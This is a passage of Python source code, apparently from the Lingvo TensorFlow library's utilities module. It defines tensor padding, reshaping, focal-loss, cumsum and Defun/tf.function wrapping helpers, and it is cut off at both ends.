paddings = tf.stack([pad, zeros], axis=1)
# If dim-i is larger than shape[i], we slice [dim_i - shape[i]:dim_i]
# for dim_i.
slice_begin = tf.shape(x) + pad - shape
x = tf.pad(x, paddings, constant_values=pad_val)
x = tf.slice(x, slice_begin, shape)
return tf.reshape(x, shape)
def ExpandTo(x, target_rank):
"""Expands the last dimension of x until it has rank target_rank."""
if x is None:
return None
shape = GetShape(x)
rank = GetRank(x)
rank_diff = target_rank - rank
if isinstance(rank_diff, tf.Tensor):
new_shape = tf.concat([shape, tf.ones([rank_diff], tf.int32)], -1)
else:
new_shape = shape + [1] * rank_diff
new_x = tf.reshape(x, new_shape)
if not isinstance(target_rank, tf.Tensor):
new_x.shape.with_rank(target_rank)
return new_x
def ExpandAndPadOrTrimTo(x, target_shape, pad_val=0):
"""Ensures that x is broadcast compatible with target_shape.
x is first expanded to the target rank. Thereafter, if x is not broadcast
compatible with target_shape the non-broadcast compatible dimensions are
either padded or trimmed to the target shape.
Args:
x: A tensor.
target_shape: A tensor shape either as a list or Tensor.
pad_val: The value to pad.
Returns:
A tensor which is broadcast compatible with target_shape.
"""
if x is None:
return None
target_rank = None
if isinstance(target_shape, tf.Tensor):
target_rank = GetShape(target_shape)[0]
else:
target_rank = len(target_shape)
x = ExpandTo(x, target_rank)
x_shape = GetShape(x)
is_static = (not isinstance(x_shape, tf.Tensor) and
all(not isinstance(d, tf.Tensor) for d in x_shape))
if is_static:
masked_target_shape = [
1 if x_shape[i] == 1 else target_shape[i] for i in range(len(x_shape))
]
else:
masked_target_shape = tf.where(
tf.equal(x_shape, 1), tf.ones_like(target_shape), target_shape)
new_x = PadOrTrimTo(x, masked_target_shape, pad_val)
return tf.reshape(new_x, masked_target_shape)
def RepeatDim(tensor, multiple, axis):
"""Copies elements in tensor's axis "multiple" times, like np.repeat."""
# x = [[1, 2, 3], [4, 5, 6]]
# RepeatDim(x, multiple=2, axis=1) gives:
# [[1, 1, 2, 2, 3, 3]. [4, 4, 5, 5, 6, 6]]
# As a comparison tf.tile(x, multiples=[1, 2]) gives:\
# [[1, 2, 3, 1, 2, 3], [4, 5, 6, 4, 5, 6]]
if multiple == 1:
return tensor
t_shape = tf.shape(tensor)
tensor_dims = tf.concat(
[t_shape[:axis], [t_shape[axis] * multiple], t_shape[axis + 1:]], 0)
multiple_dims = tf.concat([
tf.fill([axis + 1], 1), [multiple],
tf.fill([tf.rank(tensor) - axis - 1], 1)
], 0)
return tf.reshape(
tf.tile(tf.expand_dims(tensor, axis + 1), multiple_dims), tensor_dims)
def StackTensorsRecursively(values):
"""Recursively stacks Tensors in a list of `.NestedMap`.
Args:
values: a list of `.NestedMap` or Tensors to stacks.
Returns:
A `.NestedMap` with stacked values or a stacked Tensor.
"""
flatten = [w.Flatten() for w in values]
stacked = []
for i in range(len(flatten[0])):
stacked += [tf.stack([flatten[j][i] for j in range(len(flatten))])]
ret = values[0].Pack(stacked)
return ret
def MixByWeight(inputs, weights, seed=None):
"""Returns a weighted random choice and bprop type from the give inputs.
Args:
inputs: a list of callables, where each callable returns a tf.Tensor or a
nested structure containing tf.Tensor. Function return types must be
consistent across elements. The tf.Operation to compute the result tensor
will only be invoked for one input at a time. For example, if each fn
represents an input record stream, a record will be drawn only from a
selected stream while the other streams will remain unchanged.
weights: a 1D tensor of float > 0 of the same length as inputs.
seed: random seed.
Returns:
A probabilistic sample from the inputs proportional to the weights. The
return type will be the same as return type of individual 'fn' from the
inputs.
A one-hot vector of the source selected.
"""
weights = tf.convert_to_tensor(weights, dtype=tf.float32)
weights = with_dependencies([
assert_equal(tf.shape(weights), [len(inputs)]),
assert_greater_equal(tf.reduce_min(weights), 0.0)
], weights)
lower = tf.cumsum(weights, exclusive=True)
upper = tf.cumsum(weights, exclusive=False)
r = tf.random.uniform(shape=[], maxval=upper[-1], seed=seed)
return_input = tf.case(
[(tf.math.logical_and(lower[i] <= r, r < upper[i]), inputs[i])
for i in range(len(inputs))],
exclusive=True)
selected_index = tf.case(
[(tf.math.logical_and(lower[i] <= r, r < upper[i]), lambda i=i: i)
for i in range(len(inputs))],
exclusive=True)
bprop_index = tf.one_hot(selected_index, len(inputs), dtype=tf.float32)
return return_input, bprop_index
def CheckShapes(shapes):
"""Asserts that shapes is a tuple of NestedMap or tshape.Shape."""
assert isinstance(shapes, tuple), str(shapes)
for s in shapes:
if isinstance(s, NestedMap):
assert all([isinstance(t, tshape.Shape) for t in Flatten(s)
]), '{} contains non-tensor value.'.format(s)
else:
assert isinstance(s, tshape.Shape), '{}: {}'.format(type(s), s)
def FPropDtype(params):
return params.fprop_dtype if params.fprop_dtype is not None else params.dtype
def UpdateFpropDtype(params, fprop_dtype):
"""Recursively update the fprop_dtype of the Params."""
# Handle the case when the input "params" is not an instance of hyperparams
# For example, when UpdateDtype is called recursively for all the items in
# the "sub" list of SequentialLayer (see 1st elif below)
if not isinstance(params, hyperparams.Params):
return
for key, val in params.IterParams():
if isinstance(val, hyperparams.Params):
UpdateFpropDtype(val, fprop_dtype)
elif isinstance(val, (list, tuple)):
for item in val:
UpdateFpropDtype(item, fprop_dtype)
elif key == 'fprop_dtype':
params.fprop_dtype = fprop_dtype
def UpdateDtype(params, dtype):
"""Recursively update the dtype of the Params."""
# Handle the case when the input "params" is not an instance of hyperparams
# For example, when UpdateDtype is called recursively for all the items in
# the "sub" list of SequentialLayer (see 1st elif below)
if not isinstance(params, hyperparams.Params):
return
for key, val in params.IterParams():
if isinstance(val, hyperparams.Params):
UpdateDtype(val, dtype)
elif isinstance(val, (list, tuple)):
for item in val:
UpdateDtype(item, dtype)
elif key == 'dtype':
params.dtype = dtype
def NameScopeDecorator(name_scope):
"""Decorates a python function to introduce a tf.name_scope.
Example::
@py_utils.NameScopeDecorator('foobar')
def MyFoobarMethod(self):
# ... Do TF things
Args:
name_scope: The name scope to introduce.
Returns:
A function decorator.
"""
def Decorator(f):
def Wrapped(*args, **kwargs):
with tf.name_scope(name_scope):
return f(*args, **kwargs)
return Wrapped
return Decorator
def SequencesToDebugStrings(ids, lens, summarize=5):
"""Returns debug strings for the given sequences.
Args:
ids: int32 of [batch, len].
lens: int32 of [batch].
summarize: number of ids to summarize per sequence.
Returns:
A string tensor of [batch].
"""
num_seqs = tf.shape(lens)[0]
def _Body(i, result):
line = tf.strings.format('{}', ids[i, :lens[i]], summarize=summarize)
return i + 1, tf.concat([result, tf.reshape(line, [1])], axis=0)
i0 = tf.zeros(shape=[], dtype=tf.int32)
result0 = tf.constant('', shape=[0], dtype=tf.string)
_, strs = tf.while_loop(
lambda i, result: i < num_seqs,
_Body, (i0, result0),
shape_invariants=(i0.shape, tf.TensorShape([None])))
return strs
# TODO(jamesqin): follow suggestions in
# b/167460492#comment16
def RematerializeFn(fn, *xs):
"""Calls fn and rematerializes fn in the backward pass.
`fn(*xs) -> ys`, where xs and ys can be a single tensor or a tuple of tensors.
Args:
fn: A python function to be rematerialized in the backprop pass.
*xs: A single tensor or a list/tuple of tensors. `xs` are input args to the
fn function.
Returns:
`fn(*xs)`
"""
initial_step_seed = GetStepSeed()
final_step_seed = MaybeGenerateSeedFromScope()
def Backward(fwd_xs, fwd_ys, d_fwd_ys):
"""The backward function that rematerializes forward outputs."""
del fwd_ys
always_true = tf.random.uniform([]) < 2.0
# Alternatively, can do this:
# tf.where(tf.math.is_nan(x),
# tf.constant(float('nan'), dtype=x.dtype) * tf.ones_like(x),
# x)
bak_xs = [tf.where(always_true, x, tf.zeros_like(x)) for x in fwd_xs.xs]
for dst, src in zip(bak_xs, xs):
dst.set_shape(src.shape)
ResetStepSeed(initial_step_seed)
ys = fn(*bak_xs)
MaybeResetStepSeed(final_step_seed)
dxs = tf.gradients(ys, bak_xs, grad_ys=d_fwd_ys)
dxs_final = []
for dx, x in zip(dxs, bak_xs):
if dx is None:
dxs_final.append(tf.zeros_like(x))
else:
dxs_final.append(dx)
assert len(dxs_final) == len(bak_xs)
return NestedMap(
initial_step_seed=tf.zeros_like(initial_step_seed), xs=dxs_final)
ys_shapes = []
# TODO(huangyp, yonghui): Check Forward doesn't use any stateful random ops.
def Forward(fwd_xs):
"""Forward function plus sanity checks."""
for dst, src in zip(fwd_xs.xs, xs):
dst.set_shape(src.shape)
ResetStepSeed(fwd_xs.initial_step_seed)
ys = fn(*fwd_xs.xs)
# Some sanity check.
assert not GetExtraInputs()
assert not GetExtraArgs()
assert not GetExtraVars()
if isinstance(ys, tuple):
for y in ys:
assert isinstance(y, tf.Tensor)
ys_shapes.append(y.shape)
else:
assert isinstance(ys, tf.Tensor)
ys_shapes.append(ys.shape)
return ys
ys = CallDefun(
Forward,
NestedMap(initial_step_seed=initial_step_seed, xs=xs),
bak=Backward)
if isinstance(ys, tuple):
for y, s in zip(ys, ys_shapes):
y.set_shape(s)
else:
ys.set_shape(ys_shapes[0])
# TODO(b/129159299): The ResetStepSeed below is needed to work around this
# bug, which is a problem with global tensors being shared by different
# inference graphs. It should be replaced with the new step seed value
# returned from the Forward function when the bug is fixed.
MaybeResetStepSeed(final_step_seed)
return ys
# A set of names of stateful random number generator ops.
# See tensorflow/core/ops/random_ops.cc
_STATEFUL_RANDOM_OPS = frozenset({
# pyformat: disable
'RandomUniform',
'RandomUniformInt',
'RandomStandardNormal',
'ParameterizedTruncatedNormal',
'TruncatedNormal',
'RandomShuffle',
'Multinomial',
'RandomGamma',
'RandomPoisson',
'RandomPoissonV2',
# pyformat: enable
})
def StatefulRandomOpsInDefun(func, graph=None):
"""Checks whether the Defun depends on stateful random number ops.
Stateful random number generator ops should be avoid in Recurrent() call.
Otherwise, these ops produce inconsistent values between FProp and BProp.
Args:
func: a _DefinedFunction or ConcreteFunction to check.
graph: a Graph. Set None to use the default graph.
Returns:
A list of names of the stateful random ops.
Raises:
InvalidArgumentError: if the input func/graph is invalid.
"""
if graph is None:
graph = tf.get_default_graph()
func.add_to_graph(graph)
graph_def = graph.as_graph_def()
# A dict from function name to FunctionDef.
func_defs = {x.signature.name: x for x in graph_def.library.function}
if isinstance(func, function._DefinedFunction): # pylint: disable=protected-access
if func.definition.signature.name not in func_defs:
raise tf.errors.InvalidArgumentError(
None, None, 'Defun {} is not in the graph .'.format(
func.definition.signature.name))
nodes = py_collections.deque(func.definition.node_def)
else:
nodes = py_collections.deque(func.function_def.node_def)
stateful_ops = []
# Recursively search for stateful random op.
while nodes:
node = nodes.pop()
assert isinstance(node, node_def_pb2.NodeDef), node
if node.op in _STATEFUL_RANDOM_OPS:
stateful_ops.append(node.name)
continue
def _AddDefunNodes(func_name):
"""If the given func_name is a Defun, add its sub-nodes into nodes."""
if func_name in func_defs:
nodes.extend(func_defs[func_name].node_def)
# For functional.{While|For|If} ops, add their Defun attr into search.
if node.op == 'While':
_AddDefunNodes(node.attr['body'].func.name)
_AddDefunNodes(node.attr['cond'].func.name)
elif node.op == 'For':
_AddDefunNodes(node.attr['body'].func.name)
elif node.op == 'If':
_AddDefunNodes(node.attr['then_branch'].func.name)
_AddDefunNodes(node.attr['else_branch'].func.name)
elif node.op == 'StatefulPartitionedCall':
_AddDefunNodes(node.attr['f'].func.name)
elif node.op != 'PartitionedCall':
# For other op, check whether itself is a Defun op.
_AddDefunNodes(node.op)
return stateful_ops
def ToPlaceholders(nmap, dtype=None):
"""Converts every Tensor in nmap to a placeholder."""
def _ToPlacerholder(x):
shape = [None for _ in x.shape[:-1]] + [x.shape[-1]]
return tf.placeholder(dtype=dtype or x.dtype, shape=shape)
return nmap.Transform(_ToPlacerholder)
def Softmax(logits, axis=None, extra_logit=None, name=None):
"""Softmax with extra_logits, might be useful for large xformer LM."""
if extra_logit is None:
return tf.nn.softmax(logits, axis=axis, name=name)
axis = -1 if axis is None else axis
def ReduceLogSumExp(x):
max_logit = tf.math.reduce_max(
tf.stop_gradient(x), axis=axis, keepdims=True)
base_logit = tf.math.maximum(max_logit, extra_logit)
x -= base_logit
exp_x = tf.math.exp(x)
sum_exp_x = tf.math.reduce_sum(exp_x, axis=axis, keepdims=True)
sum_exp_x += tf.math.exp(extra_logit - base_logit)
return tf.math.log(sum_exp_x) + base_logit
def LogSoftmax(x):
return x - ReduceLogSumExp(x)
with tf.name_scope(name):
return tf.math.exp(LogSoftmax(logits))
def SoftmaxCrossEntropyFocalLoss(logits,
label_ids=None,
label_probs=None,
alpha=None,
gamma=None,
stop_gradient_on_focal_loss_coefficient=False):
u"""Focal loss for multinomial (softmax) logistic loss.
[1] Focal loss https://arxiv.org/abs/1708.02002
Args:
logits: [..., C]. Logits for the multinomial logistic regression. C is the
number of classes.
label_ids: [...]. Each entry in labels must be an index in [0, C).
label_probs: [..., C]. Each vector along last dimension must be a valid
probability distribution.
alpha: [C]. The weighting factor alpha. Eq (3) in [1].
gamma: []. Tunable focusing parameter. Eq (4) in [1].
stop_gradient_on_focal_loss_coefficient: If true, stops gradient on the
focal loss coefficient (1-p)^gamma to stabilize the gradient.
Returns:
loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
"""
def _ApplyFocalLossCoefficient(loss, log_probs):
if gamma is not None and gamma != 0:
probs = tf.exp(log_probs)
coefficient = tf.pow(1.0 - probs, gamma)
if stop_gradient_on_focal_loss_coefficient:
coefficient = tf.stop_gradient(coefficient)
loss *= coefficient
return loss
if label_probs is not None:
log_probs = tf.nn.log_softmax(logits)
loss = -(label_probs * log_probs)
loss = _ApplyFocalLossCoefficient(loss, log_probs)
if alpha is not None:
loss *= tf.reshape(
alpha, tf.concat([tf.ones(tf.rank(loss) - 1, tf.int32), [-1]],
axis=0))
loss = tf.reduce_sum(loss, axis=-1)
else:
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=label_ids, logits=logits)
loss = _ApplyFocalLossCoefficient(loss, -loss)
if alpha is not None:
loss *= tf.gather(alpha, label_ids)
return loss
def SigmoidCrossEntropyFocalLoss(logits, labels, alpha=None, gamma=None):
u"""Focal loss for binary (sigmoid) logistic loss.
[1] Focal loss https://arxiv.org/abs/1708.02002
Args:
logits: [..., C]. Logits for the sigmoid logistic regression.
labels: [..., C]. 0/1 labels.
alpha: The weighting factor alpha. Eq (3) in [1].
gamma: Tunable focusing parameter. Eq (4) in [1].
Returns:
loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
"""
# [1] Eq (4).
#
# The numerically-stable way to compute
# log(p) for positives;
# log(1 - p) for negatives.
loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits)
if gamma is not None and gamma != 0:
# The modulating factor. Note that
# (1 - p)ˠ = [1 - σ(x)]ˠ = [σ(-x)]ˠ, for positives.
# pˠ = [σ(x)]ˠ, for negatives.
loss *= tf.pow(tf.sigmoid(logits * (1 - labels * 2)), gamma)
if alpha is not None:
# [1] Eq (3)
loss *= (alpha * labels + (1 - alpha) * (1 - labels))
return loss
_RECORD_FORMAT_RE = re.compile('(^[A-Za-z_]+):(.*)')
def RecordFormatFromFilePattern(file_pattern):
"""Return the record format string for a Lingvo file pattern.
Lingvo file patterns take the form of:
tfrecord:/path/to/bar -> tfrecord is the record_format.
This function takes a file pattern and returns a string indicating
which format the filepattern implies.
Args:
file_pattern: String file pattern.
Returns:
Tuple (string, string):
- record_format: String record format, e.g., "tfrecord", etc.
- file_pattern: The file pattern without any prefixes.
"""
result = re.match(_RECORD_FORMAT_RE, file_pattern)
if result is None:
# TODO(vrv): Fix all callers so that file_pattern must contain
# the record format prefix.
return 'sstable', file_pattern
# regexp ensures that a match implies there are two groups:
# the record format and then the file pattern.
return result.groups()
def ReadFileLines(file_path):
"""Read a text file and return the lines.
If the file cannot be found at the given path, attempt to load it from the
Lingvo package (useful for data dependencies in par files).
Args:
file_path: path to file, either absolute or relative to the bazel workspace.
Returns:
A list of lines from the file.
"""
if not tf.io.gfile.exists(file_path):
try:
lines = pkgutil.get_data(
'lingvo', file_path.replace('lingvo/', '', 1))
if lines:
lines = lines.splitlines(True)
except IOError:
# If pkgutil can't find the file, continue and let GFile raise the error.
lines = None
else:
lines = None
if not lines:
with tf.io.gfile.GFile(file_path, 'r') as f:
lines = f.readlines()
return lines
# Partially borrowed from
# https://github.com/tensorflow/tensor2tensor/blob/32929305e1a4ec926eff24123758b794df35492b/tensor2tensor/layers/common_layers.py#L349
def CumSum(x, axis=0, exclusive=False, use_einsum=False):
"""A TPU efficient implementation of tf.cumsum().
This is equivalent to tf.cumsum and is faster on TPU as of 08/2019 unless
the axis dimension is very large. The current Tensorflow implementation is
based on scanning and reducing which is not efficient on TPU.
Args:
x: An input Tensor.
axis: An int for the axis.
exclusive: A bool for performing exclusive cumsum.
use_einsum: If true, use einsum on TPU.
Returns:
A Tensor of the same shape as x.
Raises:
ValueError: if the input axis is invalid.
"""
if x.dtype not in (tf.float32, tf.bfloat16) or not use_tpu():
# Fallback to tf.cumsum when inputs are not floats or not running on TPU.
return tf.cumsum(x, axis=axis, exclusive=exclusive)
rank = GetRank(x)
# Needs to know the rank for the final transpose if axis is not the last
# dimension. Otherwise, falls back to tf.cumsum.
if not isinstance(rank, int) and axis != -1:
return tf.cumsum(x, axis=axis, exclusive=exclusive)
if axis < -1:
if axis + rank < 0:
raise ValueError('Unexpected axis: %d (rank = %d)' % (axis, rank))
axis += rank
if use_einsum:
assert isinstance(rank, int) and rank < 26, rank
# Use einsum to avoid data formatting overhead.
a2z = ''.join([chr(i) for i in range(97, 123)]) # abc...xyz
src = a2z[:rank]
if axis == -1:
tgt = src[:-1] + 'z'
else:
tgt = src[:axis] + 'z' + src[axis + 1:]
length = GetShape(x)[axis]
causal_mask = tf.linalg.band_part(
tf.ones([length, length], dtype=x.dtype), 0, -1)
return tf.einsum(f'{src},{src[axis]}z->{tgt}', x, causal_mask)
length = GetShape(x)[axis]
my_range = tf.range(length)
comparator = tf.less if exclusive else tf.less_equal
mask = tf.cast(
comparator(tf.expand_dims(my_range, 1), tf.expand_dims(my_range, 0)),
x.dtype)
result = tf.tensordot(x, mask, axes=[[axis], [0]])
if axis != -1 and axis != rank - 1:
result = tf.transpose(
result,
list(range(axis)) + [rank - 1] + list(range(axis, rank - 1)))
return result
def ProjectLastDim(inputs, weight, input_dim, output_dim):
"""Linear projection on the last dim of the input tensor.
This is a TPU efficient implementation to avoid reshaping inputs to Rank-2
tensor by using Einsum for the compute.
Args:
inputs: An input Tensor, the last dimension of which is input_dim.
weight: A weight matrix with shape [input_dim, output_dim].
input_dim: An integer or a symbolic dim, the last dimension of the inputs.
output_dim: An integer or a symbolic dim, the last dimension of the outputs.
Returns:
An output Tensor of the same rank as inputs, the last dimension is
output_dim.
"""
input_dim = int(
symbolic.ToStatic(input_dim) if symbolic.IsExpr(input_dim) else input_dim)
output_dim = int(
symbolic.ToStatic(output_dim) if symbolic.IsExpr(output_dim
) else output_dim)
# Assert input_dim and output_dim
inputs = with_dependencies([assert_equal(GetShape(inputs)[-1], input_dim)],
inputs)
weight = with_dependencies([
assert_equal(GetShape(weight)[0], input_dim),
assert_equal(GetShape(weight)[-1], output_dim)
], weight)
if (use_tpu() and inputs.shape is not None and
inputs.shape.rank is not None and inputs.shape.rank < 26):
# Avoids reshape if feasible and uses Einsum.
if inputs.shape.rank == 2:
outputs = tf.matmul(inputs, weight)
else:
# This is equivalent to:
# outputs = tf.einsum('...y,yz->...z', inputs, weight)
# Unfortunately ... in einsum() leads to extra HBM usage.
s = ''.join([chr(x) for x in range(97, 123)]) # abc...xyz
r = inputs.shape.rank
outputs = tf.einsum('{0}y,yz->{0}z'.format(s[:r - 1]), inputs, weight)
else:
outputs = Matmul(tf.reshape(inputs, ToStaticShape([-1, input_dim])), weight)
outputs = tf.reshape(
outputs,
tf.concat([
tf.cast(GetShape(inputs)[:-1], tf.int32),
ToStaticShape([output_dim])
],
axis=0))
return outputs
@contextlib.contextmanager
def RemoveAssertContext(remove=True):
"""Hacks to replace certain unwanted tensorflow ops."""
# TODO(zhifengc/huangyp): Consider implementing assert_equal
# op replacement for lingvo. As assert_equal doesn't support String on GPUs.
# Hack to replace tf.assert_equal
# TODO(b/136040013): Remove this after migration to tf.function.
if remove:
saved_assert_equal = tf.check_ops.assert_equal
def NoOP(*args, **kwargs): # pylint: disable=unused-argument
return tf.no_op()
tf.check_ops.assert_equal = NoOP # Make assert_equal a no op.
try:
yield
finally:
tf.check_ops.assert_equal = saved_assert_equal
else:
yield
def _AssertInputsMatch(op, args, implicit_captures):
"""Assert that op's inputs match with args and implicit_captures.
Args:
op: The operation to check.
args: A nested structure representing the explicit arguments of 'op'.
implicit_captures: A nested structure representing the implicitly captured
inputs of 'op'.
Raises:
ValueError: if the number of inputs mismatch.
"""
expected_inputs = Flatten([args, implicit_captures])
expected_num_inputs = len(expected_inputs)
if len(op.inputs) > expected_num_inputs:
raise ValueError(('Too many inputs. The most likely cause is that fwd '
'captures additional tensors: extra inputs %r vs %r '
'captures=%r') % (list(op.inputs), list(expected_inputs),
list(Flatten(implicit_captures))))
if len(op.inputs) < expected_num_inputs:
raise ValueError(('Mismatched inputs to fwd: Found %d vs expected %d: %r'
'. Implicit captures(%d) = %r') %
(len(op.inputs), expected_num_inputs, list(op.inputs),
len(Flatten(implicit_captures)), implicit_captures))
def TensorSpecs(nmap, keep_shape=True):
"""Transforms tensors in the input nested structure to TensorSpecs."""
if nmap is None:
return None
fn = lambda t: tf.TensorSpec(t.shape if keep_shape else None, t.dtype)
return Transform(fn, nmap)
def _DefineDefun(fwd, fwd_sig, bak=None, bak_as_function=False, device=None):
"""Wraps fwd in a defun with custom gradient bak.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
fwd_sig: A Nested Structure of tf.TensorSpec representing the input
signature of `fwd`, or None (meaning that fwd takes no inputs).
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for `fwd`. bak needs to return
dcapture if fwd uses any implicitly captured tensors, whose gradients are
dcapture.
bak_as_function: Whether to create a TF graph function for `bak`.
device: the device on which to run `fwd` and `bak`.
Returns:
A NestedMap containing:
- call: A callable that will execute `fwd`. It has the same input and output
signatures as `fwd`.
- func: The underlying TF function that `call` calls. If not None, it will
be a _DefinedFunction or ConcreteFunction that takes flat inputs and
returns flat outputs, and can be used by routines that require a TF
function object (e.g. tf.If, tf.While, etc).
Always not None when `bak` is None.
- output_dtypes: A nested structure compatible with the outputs of `fwd`
containing the corresponding output dtypes.
- stateful_ops: A list of (op_name, op_type) tuples representing the
stateful ops used by `fwd`.
- captured_inputs: Implicit inputs captured by `fwd`.
"""
assert fwd is not None
noinline = False
if fwd_sig is None:
fwd_sig = []
get_dtype = lambda x: x.dtype
arg_dtypes = Flatten(Transform(get_dtype, fwd_sig))
get_shape = lambda x: x.shape
arg_shapes = Flatten(Transform(get_shape, fwd_sig))
# Used to hold the backward function used by Grad, which will be defined if
# bak is set.
sigs = NestedMap()
# Output of this method.
res = NestedMap()
python_grad_func = None
if bak:
def Grad(op, *args):
"""Gradient function for the forward function.
Args:
op: The forward operation.
*args: Gradients wrt op.outputs.
Returns:
Tuple of derivatives.
"""
_AssertInputsMatch(op, fwd_sig, res.captured_inputs)
# Ensure dys contains no None.
args = ConvertNoneGradientToZeros(list(op.outputs), list(args))
xs = op.inputs[:len(arg_dtypes)] # The rest are captures.
return sigs.backward(*Flatten([xs, op.outputs, args]))
python_grad_func = Grad
def _SetShape(dst_list, shape_list):
for dst, shape in zip(dst_list, shape_list):
if isinstance(dst, tf.Tensor):
dst.set_shape(shape)
@tf.Defun(*arg_dtypes, python_grad_func=python_grad_func, noinline=noinline)
def Forward(*args):
"""The forward function."""
_SetShape(args, arg_shapes)
with RemoveAssertContext(remove=noinline):
call = lambda: fwd(Pack(fwd_sig, args)) if args else fwd()
if device is None:
# Defun will handle the device assignment.
rets = call()
else:
with tf.device(device):
rets = call()
res.outputs = rets
return Flatten(rets)
forward = Forward
if not arg_dtypes:
# In this case Forward is an _OverloadedFunction, we need to instantiate it.
forward = Forward.instantiate([])
# Invokes fwd() to get res.outputs.
forward.add_to_graph(tf.get_default_graph())
res.func = forward
res.stateful_ops = forward.stateful_ops
res.captured_inputs = forward.captured_inputs
output_dtypes = Transform(get_dtype, res.outputs)
output_shapes = Transform(get_shape, res.outputs)
def Call(args=None):
"""Wrapper of fwd."""
if args is None:
flat_rets = forward()
else:
flat_rets = forward(*Flatten(args))
if not isinstance(flat_rets, (tuple, list)):
flat_rets = [flat_rets]
_SetShape(flat_rets, Flatten(output_shapes))
return Pack(output_dtypes, flat_rets)
res.call = Call
if bak:
def Backward(*args):
"""The backward function."""
_SetShape(args, Flatten([arg_shapes, output_shapes, output_shapes]))
xs, ys, dys = Pack([fwd_sig, output_dtypes, output_dtypes], args)
with RemoveAssertContext(remove=noinline):
if device is None:
# Defun will handle the device assignment.
dxs = bak(xs, ys, dys)
else:
with tf.device(device):
dxs = bak(xs, ys, dys)
return Flatten(dxs)
if bak_as_function:
sigs.backward = tf.Defun(
*Flatten([arg_dtypes, output_dtypes, output_dtypes]),
noinline=noinline)(
Backward)
sigs.backward.add_to_graph(tf.get_default_graph())
else:
sigs.backward = Backward
return res
# Global variable to control rendezvous sharing in tf.function.
# If False (default) rendezvous sharing is disabled in tf.function, that is, the
# function body use a separate rendezvous and can't communicate with parent
# graph via send/recv.
# With _GetSharedRendezvous() == True, the function body share the same
# rendezvous with the parent graph and can talk to it using send/recv. This is
# useful for layers like StackedRecurrent.
_SHARED_RENDEZVOUS = ThreadLocalStack()
@contextlib.contextmanager
def _SharedRendezvousScope(shared_rendezvous=True):
_SHARED_RENDEZVOUS.stack.append(shared_rendezvous)
try:
yield
finally:
_SHARED_RENDEZVOUS.stack.pop()
def _GetSharedRendezvous():
"""Get the current rendezvous sharing setting."""
return _SHARED_RENDEZVOUS.stack[-1] if _SHARED_RENDEZVOUS.stack else False
def _ApplySharedRendezvous(func):
"""Apply the rendezvous sharing setting on the given tf.function func."""
# pylint: disable=protected-access
func._shared_rendezvous = _GetSharedRendezvous()
# pylint: enable=protected-access
def _WrapFunction(func=None, input_signature=None):
"""Wraps func as a tf.function."""
if input_signature is None:
input_signature = []
def Decorated(fn):
@tf.function(input_signature=input_signature, autograph=False)
def Fn(*args):
# TODO(b/163904067): mimic Defun' behavior and reset the step seed to
# avoid it being used as an implicit capture. This is not a desired
# behavior, it should take the step seed from parent graph instead.
ResetStepSeed()
# Mimic Defun and disable collection sharing.
graph = tf.get_default_graph()
# Don't share summaries collection with parent graph (b/168745134).
graph.clear_collection(tf.GraphKeys.SUMMARIES)
return fn(*args)
_ApplySharedRendezvous(Fn)
# Add the function to the graph so it'll be traced under the current
# context. This is necessary if the function body captures any non-tensor
# values from the environment, like symbolic maps.
cf = Fn.get_concrete_function()
cf.add_to_graph()
return cf
# For the `foo = _WrapFunction(foo, ...)` use case.
if func is not None:
return Decorated(func)
# For the `@_WrapFunction(...)` use case.
return Decorated
def _DefineFunction(fwd, fwd_sig, bak=None, bak_as_function=False, device=None):
"""Wraps fwd in a defun with custom gradient bak.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
fwd_sig: A Nested Structure of tf.TensorSpec representing the input
signature of `fwd`, or None (meaning that fwd takes no inputs).
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for `fwd`. bak needs to return
dcapture if fwd uses any implicitly captured tensors, whose gradients are
dcapture.
bak_as_function: Whether to create a TF graph function for `bak`.
device: the device on which to run `fwd` and `bak`.
Returns:
A NestedMap containing:
- call: A callable that will execute `fwd`. It has the same input and output
signatures as `fwd`.
- func: The underlying TF function that `call` calls. If not None, it will
be a _DefinedFunction or ConcreteFunction that takes flat inputs and
returns flat outputs, and can be used by routines that require a TF
function object (e.g. tf.If, tf.While, etc).
Always not None when `bak` is None.
- outputs: The outputs of `fwd`. Used for reflection only (e.g. to get the
output dtypes, shapes, etc).
- stateful_ops: A list of (op_name, op_type) tuples representing the
stateful ops used by `fwd`.
- captured_inputs: Implicit inputs captured by `fwd`.
"""
assert fwd is not None
noinline = not use_xla()
if fwd_sig is None:
fwd_sig = []
if device is None:
# Get the current device to mimic Defun's behavior.
# pylint: disable=protected-access
device_funcs = tf.get_default_graph()._device_functions_outer_to_inner
device = device_funcs[-1] if device_funcs else None
# pylint: enable=protected-access
# Output of this method.
res = NestedMap()
@_WrapFunction(input_signature=Flatten(fwd_sig))
def Forward(*args):
"""The forward function."""
with RemoveAssertContext(remove=noinline), tf.device(device):
if args:
xs = Pack(fwd_sig, args)
rets = fwd(xs)
else:
rets = fwd()
res.outputs = rets
return Flatten(rets)
res.captured_inputs = Forward.captured_inputs
# Get the stateful ops used in cell_fn. Logic borrowed from
# _EagerDefinedFunction.__init__().
graph = Forward.graph
input_ops = set(arg.op for arg in graph.inputs)
operations = [op for op in graph.get_operations() if op not in input_ops]
res.stateful_ops = [(o.name, o.type) for o in operations if o._is_stateful] # pylint: disable=protected-access
def Call(func, args=None):
"""Wrapper of fwd."""
if args is None:
flat_rets = func()
else:
flat_rets = func(*Flatten(args))
if not isinstance(flat_rets, (tuple, list)):
flat_rets = [flat_rets]
return Pack(res.outputs, flat_rets)
if not bak:
res.func = Forward
res.call = lambda args=None: Call(Forward, args)
return res
shared_rendezvous = _GetSharedRendezvous()
ret_specs = TensorSpecs(res.outputs)
def Backward(*args):
xs, ys, dys = Pack([fwd_sig, ret_specs, ret_specs], args)
with RemoveAssertContext(remove=noinline), tf.device(device):
dxs = bak(xs, ys, dys)
return Flatten(dxs)
if bak_as_function:
backward_cf = _WrapFunction(
Backward, input_signature=Flatten([fwd_sig, ret_specs, ret_specs]))
else:
def BackwardWithSharedRendezvous(*args):
